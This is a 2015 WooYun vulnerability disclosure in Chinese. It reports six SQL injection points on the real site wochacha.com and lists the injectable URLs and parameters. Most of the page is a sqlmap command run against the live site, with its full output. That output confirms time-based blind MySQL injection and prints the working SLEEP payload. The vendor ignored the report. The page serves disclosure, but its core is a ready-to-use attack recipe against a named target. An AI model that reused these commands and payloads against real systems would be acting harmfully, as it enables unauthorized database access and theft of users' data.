当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133585

漏洞标题:我查查主站SQL注入继续打包提交

相关厂商:wochacha.com

漏洞作者: 路人甲

提交时间:2015-08-13 12:37

修复时间:2015-08-18 12:38

公开时间:2015-08-18 12:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

好了 你够了
主站注入被我收买了,各位想找的就算了吧

详细说明:

6个注入点 此站点有WAF
clid存在注入

http://www.wochacha.com/index/search?tp1=4&tp2=0&clid=1209


category存在注入

http://www.wochacha.com/index.php?m=Question&a=index&category=80


q存在注入

http://www.wochacha.com/index/search?q=1


brand_id存在注入

http://www.wochacha.com/m/brand?brand_id=


tp1存在注入

http://www.wochacha.com/directsale/search?tp1=34


tp2存在注入

http://www.wochacha.com/index/search?tp1=4&tp2=0


python sqlmap.py -u "http://www.wochacha.com/index/search?tp1=4&tp2=0&clid=1209*"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150803}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user'
s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 13:36:44
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[13:36:46] [INFO] testing connection to the target URL
[13:36:46] [INFO] testing if the target URL is stable
[13:36:47] [INFO] target URL is stable
[13:36:47] [INFO] testing if URI parameter '#1*' is dynamic
[13:36:47] [INFO] confirming that URI parameter '#1*' is dynamic
[13:36:48] [INFO] URI parameter '#1*' is dynamic
[13:36:48] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[13:36:48] [INFO] testing for SQL injection on URI parameter '#1*'
[13:36:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:36:49] [INFO] heuristics detected web page charset 'ascii'
[13:36:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[13:36:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[13:37:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:37:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:37:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:37:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[13:37:21] [INFO] testing 'MySQL inline queries'
[13:37:21] [INFO] testing 'PostgreSQL inline queries'
[13:37:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[13:37:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[13:37:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[13:37:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[13:37:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[13:37:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[13:37:51] [INFO] URI parameter '#1*' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values?
[Y/n] n
[13:37:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:37:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one othe
r (potential) technique found
[13:38:12] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://www.wochacha.com:80/index/search?tp1=4&tp2=0&clid=1209' AND (SELECT * FROM (SELECT(SLEEP(5)))GCJH) A
ND 'bYXD'='bYXD
---
[13:38:34] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.12
[13:38:34] [INFO] fetched data logged to text files under
[*] shutting down at 13:38:34


截几个注入图吧

1.jpg

漏洞证明:

2.jpg


3.jpg


跑得太慢,跟上个洞裤是一样的

4.jpg


wooyun.jpg

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-18 12:38

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-22 14:23 | Submit ( 普通白帽子 | Rank:338 漏洞数:81 )

    @我查查信息技术(上海)有限公司 提交了这么多洞,都不确认 忽略, 好歹意思意思下